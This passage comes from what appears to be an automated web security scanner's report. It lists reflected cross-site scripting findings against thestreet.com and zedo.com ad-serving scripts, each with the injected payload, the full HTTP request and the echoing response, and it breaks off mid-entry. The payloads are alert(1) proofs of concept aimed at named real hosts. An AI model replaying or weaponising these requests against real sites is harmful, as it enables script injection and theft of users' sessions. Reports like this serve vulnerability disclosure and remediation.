Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:28 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 190
Date: Thu, 03 Feb 2011 18:54:27 GMT

document.write('<img width="0" height="0" src="http://tag.admeld.com/match9ad9f';alert(1)//03ee31b5e06?admeld_adprovider_id=8&external_user_id=gFEcJzqCjXJj&_segment=2%7CgFEcJzqCjXJj%7C"/>');

1.79. http://business-news.thestreet.com/ocregister [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business-news.thestreet.com
Path:   /ocregister

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b12"><script>alert(1)</script>c8944471237 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ocregister?b9b12"><script>alert(1)</script>c8944471237=1 HTTP/1.1
Host: business-news.thestreet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=0
Last-Modified: Thu, 03 Feb 2011 19:04:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie, Accept-Encoding
ETag: "1296759876"
Content-Type: text/html; charset=utf-8
Content-Length: 65305
X-Served-By: pmisccache01.dc.thestreet.com
Date: Thu, 03 Feb 2011 19:04:38 GMT
X-Varnish: 209384145
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Date Created: 20110203 14:04:38 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<a href="/ocregister?b9b12"><script>alert(1)</script>c8944471237=1/story/10-terrible-financial-choices-in-music-history/10993786">
...[SNIP]...

1.80. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 693e2"%3balert(1)//dacff80c547 was submitted in the $ parameter. This input was echoed as 693e2";alert(1)//dacff80c547 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=693e2"%3balert(1)//dacff80c547&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:693e2";alert(1)//dacff80c547;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=131
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:53 GMT
Connection: close
Content-Length: 2524

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',693e2";alert(1)//dacff80c547';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,693e2";alert(1)//dacff80c547;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.81. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a18d5"%3balert(1)//fb81859235a was submitted in the $ parameter. This input was echoed as a18d5";alert(1)//fb81859235a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=&$=a18d5"%3balert(1)//fb81859235a&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a18d5";alert(1)//fb81859235a;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2511

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',a18d5";alert(1)//fb81859235a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,a18d5";alert(1)//fb81859235a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.82. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6763'%3balert(1)//afd391d5acc was submitted in the $ parameter. This input was echoed as a6763';alert(1)//afd391d5acc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=a6763'%3balert(1)//afd391d5acc&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a6763';alert(1)//afd391d5acc;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=130
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:54 GMT
Connection: close
Content-Length: 2524

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',a6763';alert(1)//afd391d5acc';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,a6763';alert(1)//afd391d5acc;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.83. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0b32'%3balert(1)//539eff4924d was submitted in the $ parameter. This input was echoed as a0b32';alert(1)//539eff4924d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=&$=a0b32'%3balert(1)//539eff4924d&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a0b32';alert(1)//539eff4924d;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2511

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',a0b32';alert(1)//539eff4924d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,a0b32';alert(1)//539eff4924d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.84. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e0a0'-alert(1)-'be3b67982cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?8e0a0'-alert(1)-'be3b67982cf=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1220,175,9:1220,175,14; ZFFAbh=749B826,20|1483_759#365; FFad=1:1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 985
Content-Type: application/x-javascript
Set-Cookie: FFad=0:1:1;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,175,9:1220,175,14;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=412
Expires: Thu, 03 Feb 2011 16:18:54 GMT
Date: Thu, 03 Feb 2011 16:12:02 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fm.js;qs=8e0a0'-alert(1)-'be3b67982cf=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.85. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c38c1'%3balert(1)//9f2a1335fe8 was submitted in the q parameter. This input was echoed as c38c1';alert(1)//9f2a1335fe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=c38c1'%3balert(1)//9f2a1335fe8&$=&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2508

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='c38c1';alert(1)//9f2a1335fe8';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=c38c1';alert(1)//9f2a1335fe8;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.86. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

